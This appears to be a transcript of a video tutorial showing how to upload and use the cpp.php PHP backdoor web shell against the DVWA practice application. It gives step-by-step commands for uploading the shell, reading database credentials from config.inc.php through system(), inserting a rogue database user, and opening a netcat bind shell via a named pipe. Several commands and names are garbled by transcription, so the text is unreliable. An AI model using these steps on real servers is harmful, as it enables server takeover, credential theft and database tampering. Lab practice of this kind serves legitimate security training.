Welcome. In this video, we are going to learn upload and use cpp.php backdoor shell in web application hacking tool. What is upload attack vector? An upload attack vector exists when a website application provides the ability to upload files. Upload files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend system, and simple defacement. It depends upon what the application does with the uploaded file, including where it is stored. What is cpp.php? The cpp.php utility provides functionality for listing files, brute forcing FTP passwords, updating itself, executing shell commands, and PHP code. It also provides for connecting to MySQL databases and initiating a connect back shell session. In many ways, it can be considered the web equivalent of the rootkits that successful attackers often download. In other ways, it is the malware equivalent of PHP shell itself. The CPP is often one of the utility programs that is either downloaded if a web server is vulnerable due to being misconfigured, or can be used in a remote file include attack to try and execute shell commands on a vulnerable server. In this video, you will see CPP PHP shell running on a web server. Let's open up terminal. Here I am creating a directory using mkdir Linux command. Type mkdir space -p root /backdoor. Now change terminal directory to backdoor. So now let's download rar file, which is backdoor file. You can download it. I have uploaded this rar file. Type wget, paste the rar link. Downloading is complete. Let's extract rar file using unrar command. So type unrar space x stuff.rar. Type cat part1.txt, part2.txt, part3.txt, greater than symbol cpp.php. You can see that there is a 3-part txt file. Using this command, I will append all this part into cpp.php file. Type ls. Here you see that cpp.php file is created. Type cp space cpp.php cpp.php.bkp. Type ls space -lrta. You see that the list of files and its permission. Let's configure and prepare cpp.php. Type head -1 cpp.php. Here notice how the first line does not contain less than symbol question mark. Type sed -i $1s /dot $$ less than symbol question mark php /g cpp.php. This only replaces the first line of the file with less than symbol question mark php. Type head -1 cpp.php. Notice how the first line does contain less than symbol question mark php. gzip is a file format and a software application used for file compression and decompression. The program was created by Jean Loeb Kelly and Mark Adler as a free software replacement for the compress. gzip cpp.php. I compress cpp.php because DVWA does not allow you to upload files greater than 10,000 bytes. I use gzip instead of rar because gzip pretty much comes standard on most flavors of Linux. ls space -l, you can see that cpp.php.gz. Now let's open up browser and log in with DVWA, username as admin and password as password. Now click on DVWA security in the left hand menu, select low, click submit button, security low is set. Select upload from the left navigation menu. Here I am uploading cpp.php.gz file which we have created in desktop. Now select and upload. Here you will receive a successfully uploaded message. Let's open up dvwa/hackable/uploads web directory. Here you can see file is uploaded here. Click on it. It will reload and we get cpp.php file. Now let's open up cpp.php in new tab. Server security information using cpp.php. To grab database password, click on the SEC link. Select find config.inc.php files. Sometimes ignorant application admins place the database config files in the public location. Click on the execute button, server security information, var/www.html dvwa config/config.inc.php, copied it. Click on the PHP code link in the execution PHP code box, type system in the bracket cat var/www/html/dvwa config.inc.php and click on the execution button. Extract database password. Here notice the config.inc.php file lists the database name, username and password information. Write down the database name, username and password information. Now using cpp.php to examine the privilege of the database, click the SQL navigation link. Username root, password DVWA password is blank. Database DVWA, click the connect button. Click the users table from left to right. It stands for delete, drop and insert. Notice you have the ability to create and dump the database. Here you can see that the user table data, you can able to modify and delete any field. Click the insert navigational link. Let's type user ID Amit, first name Amit Hudar, last name Sawdust, user Amit. Select the password from the drop down. Password Amit Hudar avatar NA. Click the confirm button. Notice the SQL insert line that will be inserted into the database. Here the author allows you to tweak it if you need to. Click on the yes button. Here you can see that a new record appears. Now click on bind navigational link. In the command execute box, enter the below syntax mkf info tmp/pipe sh tmp/pipe or symbol nc-l444 greater than symbol tmp pipe. Click the execute button. It will take few minutes. After completion, you get connecting message in the tab. This means a netcat session is started. That's it in this video on DVWA Upload and Use cpp.php backdoor shell. Thank you for watching this video.